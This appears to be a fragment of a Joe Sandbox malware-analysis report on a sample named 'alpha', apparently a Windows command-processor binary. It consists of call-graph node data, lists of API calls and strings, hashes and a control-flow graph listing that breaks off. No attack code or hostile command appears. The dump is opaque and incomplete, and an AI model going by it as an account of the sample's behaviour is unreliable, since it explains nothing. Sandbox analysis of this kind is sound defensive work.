21232 4c7b8 SetFilePointer 21215->21232 21233 5d1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21215->21233 21234 4c86f wcschr 21215->21234 21235 4ca03 iswspace 21215->21235 21236 4ca1e wcschr 21215->21236 21237 4caeb wcschr 21215->21237 21238 
4ca49 wcschr 21215->21238 21239 5d2b3 _get_osfhandle SetFilePointer 21215->21239 21240 4cb10 iswspace 21215->21240 21241 4cb25 wcschr 21215->21241 21242 5d322 _get_osfhandle SetFilePointer 21215->21242 21243 5d302 WideCharToMultiByte 21215->21243 21244 4cb80 wcschr 21215->21244 21245 4cb50 iswspace 21215->21245 21246 4cb65 wcschr 21215->21246 21248 4cbc9 _wcsicmp 21215->21248 21249 5d3d3 WideCharToMultiByte 21215->21249 21216->21215 21217 4c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21216->21217 21217->21215 21221 5d3fc 21218->21221 21224 4cabd _get_osfhandle SetFilePointer 21218->21224 21219->21215 21222 4ca81 21220->21222 21223 51cb1 450 API calls 21221->21223 21225 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21222->21225 21227 5d409 21223->21227 21224->20949 21226 4ca90 21225->21226 21226->20949 21230 478e4 448 API calls 21227->21230 21228->21215 21229->21215 21231 5d427 21230->21231 21232->21215 21233->21215 21234->21215 21235->21215 21235->21236 21236->21215 21237->21215 21237->21239 21238->21215 21239->21215 21239->21240 21240->21215 21240->21241 21241->21215 21242->21215 21243->21242 21247 4cb96 wcschr 21244->21247 21244->21248 21245->21215 21245->21246 21246->21215 21247->21215 21247->21248 21248->21215 21249->21215 21748 49e09 21250->21748 21253 49de1 21255 49df7 21253->21255 21258 49950 448 API calls 21253->21258 21254 5c2b9 21256 463bd 448 API calls 21254->21256 21255->20915 21257 5c2d1 21256->21257 21257->21255 21762 69fcf _get_osfhandle GetFileType 21257->21762 21258->21255 21260 5c2e5 21261 4dd98 6 API calls 21260->21261 21262 5c2e9 21260->21262 21261->21262 21262->21255 21263 478e4 448 API calls 21262->21263 21264 5c316 21263->21264 21264->21264 21266 4e3f0 17 API calls 21265->21266 21267 47fa0 21266->21267 21268 47fa4 GetDriveTypeW 21267->21268 21269 48001 21267->21269 21275 47fcf 21268->21275 21278 5b033 21268->21278 21270 48013 21269->21270 21271 4800b ??_V@YAXPAX 21269->21271 21272 56b30 
__ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21270->21272 21271->21270 21274 48022 21272->21274 21273 5b05a ??_V@YAXPAX 21273->21270 21274->20889 21274->20909 21275->21269 21276 47fe0 GetVolumeInformationW 21275->21276 21276->21269 21277 5b040 GetLastError 21276->21277 21277->21269 21277->21278 21278->21270 21278->21273 21281 52200 21279->21281 21280 52229 21280->20905 21281->21280 21281->21281 21282 52081 918 API calls 21281->21282 21282->21280 21763 526dc memset 21283->21763 21287 4e3f0 17 API calls 21286->21287 21288 45f21 21287->21288 21289 59d02 21288->21289 21290 59d0f 21288->21290 21291 48e9e 448 API calls 21288->21291 21290->21289 21353 49cd3 21352->21353 21377 49780 21352->21377 21354 4dcd0 448 API calls 21353->21354 21355 49cdd 21354->21355 21356 4a62f wcschr 21355->21356 21355->21377 21377->20915 21560 5ca49 21559->21560 21563 4aa90 21559->21563 21561 4bc30 448 API calls 21560->21561 21579 5ca70 21560->21579 21653 65166 21560->21653 21561->21560 21563->21560 21564 4aacb _wcsnicmp 21563->21564 21565 4ab3d 21564->21565 21566 4aadf _wcsnicmp 21564->21566 21584 53326 21565->21584 21567 5c9fd 21566->21567 21573 4aaf7 21566->21573 21616 653aa 21567->21616 21571 4ab0f 21575 4ab1b wcschr 21571->21575 21583 5cad1 21571->21583 21572 478e4 448 API calls 21576 5cb08 21572->21576 21573->21571 21574 5ca2d wcsrchr 21573->21574 21573->21583 21574->21571 21577 4ab47 21575->21577 21578 4ab29 21575->21578 21582 50060 5 API calls 21579->21582 21579->21583 21582->21583 21583->21572 21585 5333b 21584->21585 21594 533ab 21584->21594 21587 50060 5 API calls 21585->21587 21585->21594 21586 478e4 448 API calls 21588 5f76c 21586->21588 21589 53349 21587->21589 21594->21586 21617 4acb0 448 API calls 21616->21617 21654 6516f 21653->21654 21658 65190 21653->21658 21738 5727b __iob_func 21654->21738 21656 65180 fprintf 21656->21560 21657 651dd 21657->21560 21658->21657 21659 49950 448 API calls 21658->21659 21659->21658 21738->21656 21740 4ab7f 2 API calls 
21739->21740 21741 4b3d3 21740->21741 21742 4ab7f 2 API calls 21741->21742 21746 4b3eb 21741->21746 21742->21746 21743 4b3f6 wcschr 21744 4b408 wcschr 21743->21744 21745 4b440 21743->21745 21744->21745 21744->21746 21745->21204 21746->21743 21746->21744 21746->21745 21747 4a62f wcschr 21746->21747 21747->21746 21749 49e14 21748->21749 21758 49dd5 21748->21758 21750 49e8e iswspace 21749->21750 21753 49e19 21750->21753 21751 49e27 iswspace 21752 49e40 21751->21752 21751->21753 21754 49e8e iswspace 21752->21754 21753->21751 21753->21752 21753->21758 21755 49e47 21754->21755 21756 49e62 21755->21756 21757 5c31b _wcsnicmp 21755->21757 21755->21758 21759 49e71 _wcsnicmp 21756->21759 21760 49e67 21756->21760 21757->21758 21757->21760 21758->21253 21758->21254 21759->21758 21759->21760 21760->21758 21761 478e4 448 API calls 21760->21761 21761->21758 21762->21260 21764 4e3f0 17 API calls 21763->21764 21765 527be 21764->21765 21766 528f8 21765->21766 21767 527c8 memset GetEnvironmentVariableW 21765->21767 21768 52912 21766->21768 21769 5290a ??_V@YAXPAX 21766->21769 21770 4e3f0 17 API calls 21767->21770 21771 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21768->21771 21769->21768 21774 52830 21770->21774 21772 52925 21771->21772 21772->20915 21773 528e2 21773->21766 21775 5f431 ??_V@YAXPAX 21773->21775 21774->21773 21776 5284a GetEnvironmentVariableW 21774->21776 21775->21766 21777 52865 21776->21777 21778 5f3b2 21776->21778 21794 49144 21777->21794 21780 49144 448 API calls 21778->21780 21781 5f3cd 21780->21781 21781->21777 21783 478e4 448 API calls 21781->21783 21782 52872 21782->21773 21784 48e9e 448 API calls 21782->21784 21786 5f3e7 21782->21786 21783->21777 21795 4bc30 446 API calls 21794->21795 21800 49172 21795->21800 21796 5b904 21796->21782 21796->21796 21797 4926f 21801 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 21797->21801 21798 491a6 towupper 21798->21800 21799 5bb35 21805 4dcd0 446 API calls 
21799->21805 21800->21796 21800->21797 21800->21798 21800->21799 21802 50060 5 API calls 21800->21802 21804 5bad3 21800->21804 21807 5054b 446 API calls 21800->21807 21810 5669f 446 API calls 21800->21810 21811 5ba93 21800->21811 21814 492c2 21800->21814 21817 6a37a 446 API calls 21800->21817 21802->21800 21812 463bd 446 API calls 21804->21812 21807->21800 21810->21800 21815 6a53d 446 API calls 21811->21815 21812->21797 21819 478e4 446 API calls 21814->21819 21815->21804 21817->21800 22132 4e7c6 22131->22132 22133 4e7a2 22131->22133 22136 4e697 22132->22136 22137 4dc60 2 API calls 22132->22137 22134 4e7ab wcschr 22133->22134 22133->22136 22135 4e7f4 22134->22135 22134->22136 22138 4dcd0 448 API calls 22135->22138 22136->20964 22136->20971 22137->22136 22140 4e7fe 22138->22140 22139 4e8f7 22139->22136 22143 4dd20 448 API calls 22139->22143 22144 4e83f 22139->22144 22140->22136 22140->22139 22142 4bf70 456 API calls 22140->22142 22140->22144 22141 4dc60 2 API calls 22141->22136 22142->22140 22143->22144 22144->22136 22144->22141 22146 51615 lstrcmpiW 22145->22146 22147 51606 lstrcmpW 22145->22147 22148 5160c 22146->22148 22147->22148 22148->20981 22150 52998 22149->22150 22151 529ff lstrcmpW 22150->22151 22152 52a09 lstrcmpiW 22150->22152 22153 529a0 22150->22153 22151->22153 22152->22153 22153->20981 22155 4a1bd 22154->22155 22155->20997 22156->20997 22158 5054b 448 API calls 22157->22158 22163 50c22 22158->22163 22159 50d9e 22160 4bc30 448 API calls 22159->22160 22208 50e27 22159->22208 22160->22208 22161 510ae 22161->21080 22162 4dd20 448 API calls 22165 50d6a 22162->22165 22163->22159 22166 50c93 _wcsnicmp 22163->22166 22196 4dc60 2 API calls 22163->22196 22203 5054b 448 API calls 22163->22203 22163->22208 22209 50d4a 22163->22209 22210 5118f wcstol 22163->22210 22211 5129a wcstol 22163->22211 22164 51436 CreateFileW 22167 51457 SetFilePointer SetFilePointer 22164->22167 22168 5ed11 22164->22168 22169 4dd20 448 API calls 22165->22169 22170 50cac _wcsnicmp 
22166->22170 22166->22208 22173 4dcd0 448 API calls 22167->22173 22171 478e4 448 API calls 22168->22171 22179 50d81 22169->22179 22174 50cc7 _wcsnicmp 22170->22174 22182 5ebf5 22170->22182 22175 5ed1e GetLastError 22171->22175 22172 698b5 453 API calls 22172->22208 22173->22208 22180 50ce2 _wcsnicmp 22174->22180 22174->22208 22175->22161 22176 5ed00 CloseHandle 22176->22161 22177 5148a ReadFile CloseHandle 22177->22208 22178 5ec27 22183 478e4 448 API calls 22178->22183 22179->22159 22179->22178 22180->22163 22181 51131 _wcsnicmp 22180->22181 22186 51563 wcstol 22181->22186 22187 5114c _wcsnicmp 22181->22187 22189 478e4 448 API calls 22182->22189 22190 5ec33 22183->22190 22184 4dd20 448 API calls 22184->22208 22185 4dc60 GetProcessHeap RtlFreeHeap 22185->22208 22186->22182 22186->22208 22187->22163 22187->22182 22188 512d3 _wpopen 22193 5ece5 22188->22193 22194 512ff feof 22188->22194 22189->22161 22195 69922 448 API calls 22190->22195 22191 5198f 3 API calls 22191->22208 22192 51546 22204 4dc60 2 API calls 22192->22204 22199 478e4 448 API calls 22193->22199 22197 51313 ferror 22194->22197 22198 5136e _pclose 22194->22198 22202 5ec3b longjmp 22195->22202 22196->22163 22197->22198 22197->22208 22206 4dd20 448 API calls 22198->22206 22205 5ecf2 GetLastError 22199->22205 22200 5ecb3 _pclose 22200->22161 22201 5134d fgets 22201->22198 22201->22208 22202->22161 22203->22163 22204->22200 22205->22161 22206->22208 22207 513db MultiByteToWideChar 22207->22208 22208->22161 22208->22164 22208->22172 22208->22176 22208->22177 22208->22184 22208->22185 22208->22186 22208->22188 22208->22191 22208->22192 22208->22198 22208->22200 22208->22201 22208->22207 22208->22208 22208->22211 22212 514e7 feof 22208->22212 22213 50fc8 wcschr 22208->22213 22214 4dcd0 448 API calls 22208->22214 22215 5ecc9 22208->22215 22216 50f0a wcschr 22208->22216 22217 50bbb 485 API calls 22208->22217 22219 513b7 memmove 22208->22219 22220 50f90 wcschr 22208->22220 22209->22159 22209->22162 22210->22163 
22210->22182 22211->22182 22211->22208 22212->22197 22212->22208 22213->22208 22214->22208 22218 478e4 448 API calls 22215->22218 22216->22208 22217->22208 22218->22161 22219->22208 22220->22208 22222 46f39 22221->22222 22225 46ea7 22221->22225 22223 56b30 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 4 API calls 22222->22223 22224 46f4e 22223->22224 22224->21080 22225->22222 22226 5a746 22225->22226 22228 46f5d 22225->22228 22230 4a62f wcschr 22225->22230 22235 50bbb 485 API calls 22225->22235 22238 5198f 3 API calls 22225->22238 22227 698b5 453 API calls 22226->22227 22257 4701a 22227->22257 22229 50060 5 API calls 22228->22229 22231 46f64 22229->22231 22230->22225 22233 4acb0 448 API calls 22231->22233 22232 4dcd0 448 API calls 22232->22257 22234 46f6b 22233->22234 22236 5589a 10 API calls 22234->22236 22235->22225 22237 46fa6 22236->22237 22242 48f21 448 API calls 22237->22242 22237->22257 22238->22225 22239 4dc60 2 API calls 22239->22257 22240 698b5 453 API calls 22240->22257 22241 55851 2 API calls 22241->22257 22250 46fbf 22242->22250 22243 5a7fa 22249 4dc60 2 API calls 22243->22249 22244 5198f 3 API calls 22244->22257 22245 48b4d 2 API calls 22245->22257 22246 5a806 22247 69922 448 API calls 22246->22247 22251 5a80b longjmp 22247->22251 22248 4725d 22254 5a851 22248->22254 22255 47271 22248->22255 22249->22246 22250->22246 22252 4dcd0 448 API calls 22250->22252 22250->22257 22253 5a819 22251->22253 22252->22257 22306 521d2 22253->22306 22256 69a7d 448 API calls 22254->22256 22258 48bc7 448 API calls 22255->22258 22260 5a85c 22256->22260 22257->22232 22257->22239 22257->22240 22257->22241 22257->22243 22257->22244 22257->22245 22257->22246 22257->22248 22263 4dd20 448 API calls 22257->22263 22265 50bbb 485 API calls 22257->22265 22261 4727b GetProcessHeap RtlFreeHeap 22258->22261 22264 472ee 8 API calls 22261->22264 22262 5a824 22267 51e70 448 API calls 22262->22267 22269 5a835 exit 22262->22269 22263->22257 22266 47294 22264->22266 22265->22257 

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 00048791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00046906,0000001F,?,00000080), ref: 00048791
                                                                      • GetLocaleInfoW.KERNELBASE(00000000,0000001E,0007C9E0,00000008), ref: 0004859E
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000485BC
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00048614
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00048653
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0007C9D0,00000008), ref: 0004867D
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0007C970,00000020), ref: 00048698
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0007C930,00000020), ref: 000486B0
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000033,0007C8F0,00000020), ref: 000486C8
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000034,0007C8B0,00000020), ref: 000486E0
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000035,0007C870,00000020), ref: 000486F8
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000036,0007C830,00000020), ref: 00048710
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000037,0007C7F0,00000020), ref: 00048728
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000E,0007C9C0,00000008), ref: 00048743
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000000F,0007C9B0,00000008), ref: 0004875B
                                                                      • setlocale.MSVCRT ref: 00048770
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$DefaultUsersetlocale
                                                                      • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                                                      • API String ID: 1351325837-2236139042
                                                                      • Opcode ID: adb845fc361d49710dc648f9f2b9a178651a5ca7c9924224a406f4902664fd9b
                                                                      • Instruction ID: 2c104b7e7d4393285f2ba76a05b4f849574467033e56347c6849748b43dc8946
                                                                      • Opcode Fuzzy Hash: adb845fc361d49710dc648f9f2b9a178651a5ca7c9924224a406f4902664fd9b
                                                                      • Instruction Fuzzy Hash: 51C101B570021296EBB08F39CD08B7B37E9AF51741F20553AED46DA284EF78DA09C764

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,?,00000000,00000000,00000000), ref: 00050297
                                                                      • FindClose.KERNELBASE(00000000), ref: 000502B0
                                                                      • memcpy.MSVCRT(?,?,?), ref: 00050311
                                                                      • _wcsnicmp.MSVCRT ref: 00050367
                                                                      • _wcsicmp.MSVCRT ref: 0005E746
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                      • String ID:
                                                                      • API String ID: 242869866-0
                                                                      • Opcode ID: 60acd6d37f327ec0c697dc494c5cb26ccd737d68050adbefaf257cc1edde1d27
                                                                      • Instruction ID: 353d2c70862106dab951ea1ec72d1577530fd8f4861e6766a28d7ac294dd1c37
                                                                      • Opcode Fuzzy Hash: 60acd6d37f327ec0c697dc494c5cb26ccd737d68050adbefaf257cc1edde1d27
                                                                      • Instruction Fuzzy Hash: 99519F756083119BDB24DF28D8486AFB7E5FFC8311F144A2EEC8987240E735DA09CB96

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0004A9C5), ref: 0004A9D8
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0004A9F3
                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0004A9FA
                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0004AA09
                                                                      • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0004AA12
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemcpy
                                                                      • String ID:
                                                                      • API String ID: 429350006-0
                                                                      • Opcode ID: 4ec8e3ce127d6bf6d3f35f20f6203acc4e4ddf521c912c2f69158c02627748d3
                                                                      • Instruction ID: bfd4695365c18c7591114bf7d286c7eb9f6990f3a3f8784647f27cf5b6226496
                                                                      • Opcode Fuzzy Hash: 4ec8e3ce127d6bf6d3f35f20f6203acc4e4ddf521c912c2f69158c02627748d3
                                                                      • Instruction Fuzzy Hash: B7E092B774112027FA1167293C8CDAF2A9DEBC6662F050025F849D3202DF2C8C0687B3

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0007CA04), ref: 000487EE
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000487FA
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 0004880E
                                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00067460,00000001), ref: 0004881B
                                                                      • _get_osfhandle.MSVCRT ref: 00048828
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00048830
                                                                      • _get_osfhandle.MSVCRT ref: 0004883C
                                                                      • GetConsoleMode.KERNELBASE(00000000), ref: 00048844
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E318
                                                                        • Part of subcall function 0004E310: SetConsoleMode.KERNELBASE(00000000), ref: 0004E322
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E32F
                                                                        • Part of subcall function 0004E310: GetConsoleMode.KERNELBASE(00000000), ref: 0004E339
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E35E
                                                                        • Part of subcall function 0004E310: GetConsoleMode.KERNELBASE(00000000), ref: 0004E368
                                                                        • Part of subcall function 0004E310: _get_osfhandle.MSVCRT ref: 0004E390
                                                                        • Part of subcall function 0004E310: SetConsoleMode.KERNELBASE(00000000), ref: 0004E39A
                                                                        • Part of subcall function 0004A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,0004A9C5), ref: 0004A9D8
                                                                        • Part of subcall function 0004A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 0004A9F3
                                                                        • Part of subcall function 0004A9D4: RtlAllocateHeap.NTDLL(00000000), ref: 0004A9FA
                                                                        • Part of subcall function 0004A9D4: memcpy.MSVCRT(00000000,00000000,00000000), ref: 0004AA09
                                                                        • Part of subcall function 0004A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 0004AA12
                                                                        • Part of subcall function 00048B96: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0004885E), ref: 00048B9D
                                                                        • Part of subcall function 00048B96: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0004885E), ref: 00048BA4
                                                                        • Part of subcall function 00048273: RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Command Processor,00000000,02000000,?), ref: 000482D3
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,DisableUNCCheck,00000000,?,?,?), ref: 00048313
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,EnableExtensions,00000000,00000001,?,00001000), ref: 0004834D
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,DelayedExpansion,00000000,00000001,?,00001000), ref: 0004839D
                                                                        • Part of subcall function 00048273: RegQueryValueExW.KERNELBASE(?,DefaultColor,00000000,00000001,?,00001000), ref: 000483D7
                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 0004886A
                                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 000488A5
                                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000000,-00000105,00000000), ref: 00048987
                                                                      • GetConsoleOutputCP.KERNELBASE(?,?,00000000,-00000105,00000000), ref: 000489AB
                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 000489BC
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.KERNELBASE(00000000,0000001E,0007C9E0,00000008), ref: 0004859E
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000023,?,00000080), ref: 000485BC
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000021,?,00000080), ref: 00048614
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000024,?,00000080), ref: 00048653
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001D,0007C9D0,00000008), ref: 0004867D
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000031,0007C970,00000020), ref: 00048698
                                                                        • Part of subcall function 00048572: GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00000032,0007C930,00000020), ref: 000486B0
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 000489CD
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 000489D4
                                                                      • GetConsoleTitleW.KERNELBASE(00000000,00000104), ref: 000489E9
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?), ref: 00048A23
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00048A2A
                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00048AB5
                                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 00048AC0
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 00048AD1
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 00048AE7
                                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 00048AF8
                                                                      • free.MSVCRT(?), ref: 00048B18
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Console$Info$Locale$HeapMode_get_osfhandle$QueryValue$AddressCriticalProcProcessSection$AllocCommandEnvironmentFreeHandleLineStrings$AllocateBufferCtrlDirectoryEnterGlobalHandlerInitializeLeaveModuleOpenOutputScreenTitleWindowsfreememcpy
                                                                      • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                      • API String ID: 3313898297-3021193919
                                                                      • Opcode ID: 598ccef90171f724706b7c2b9ba84d1279c7209ab722767ec0e908cf764d9683
                                                                      • Instruction ID: 642859553c6f143bcdd872e065b45fbd03d9a5829e595d6083c7881b80eaf5b5
                                                                      • Opcode Fuzzy Hash: 598ccef90171f724706b7c2b9ba84d1279c7209ab722767ec0e908cf764d9683
                                                                      • Instruction Fuzzy Hash: CE91A7B1B007009FFB14AB64DC1EAAE37A5FB45701B04843AF646DB192DF789C81CB5A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 207 48273-482b7 call 57f80 210 482bd-482db RegOpenKeyExW 207->210 211 48540-4854c 210->211 212 482e1-4831b RegQueryValueExW 210->212 211->210 213 48552-48571 time srand call 56b30 211->213 214 5b0f1-5b0f8 212->214 215 48321-48355 RegQueryValueExW 212->215 217 5b10d-5b114 214->217 218 5b0fa-5b108 214->218 219 48357-4835e 215->219 220 48371-483a5 RegQueryValueExW 215->220 217->215 224 5b11a-5b134 _wtol 217->224 218->215 225 48364-4836a 219->225 226 5b139-5b140 219->226 221 5b165-5b16c 220->221 222 483ab-483df RegQueryValueExW 220->222 230 5b181-5b188 221->230 231 5b16e-5b17c 221->231 227 483e1-483e8 222->227 228 483fb-4842f RegQueryValueExW 222->228 224->215 225->220 226->220 229 5b146-5b160 _wtol 226->229 232 5b1ad-5b1b4 227->232 233 483ee-483f5 227->233 234 48431-48438 228->234 235 4846c-484a0 RegQueryValueExW 228->235 229->220 230->222 236 5b18e-5b1a8 _wtol 230->236 231->222 232->228 237 5b1ba-5b1cb wcstol 232->237 233->228 238 5b1d3-5b1da 234->238 239 4843e-4844e 234->239 240 484a6-484ad 235->240 241 5b24c-5b254 235->241 236->222 237->238 242 5b1f5 238->242 243 5b1dc-5b1ed wcstol 238->243 244 48454-4845d 239->244 245 5b200-5b202 239->245 246 484b3-484c3 240->246 247 5b20f-5b216 240->247 248 5b25a-5b25d 241->248 242->245 243->242 249 5b203-5b20a 244->249 250 48463-48466 244->250 245->249 251 5b23c-5b23e 246->251 252 484c9-484d2 246->252 253 5b231 247->253 254 5b218-5b229 wcstol 247->254 256 484f4 248->256 257 5b263-5b269 248->257 249->235 250->235 250->249 255 5b23f-5b241 251->255 252->255 258 484d8-484db 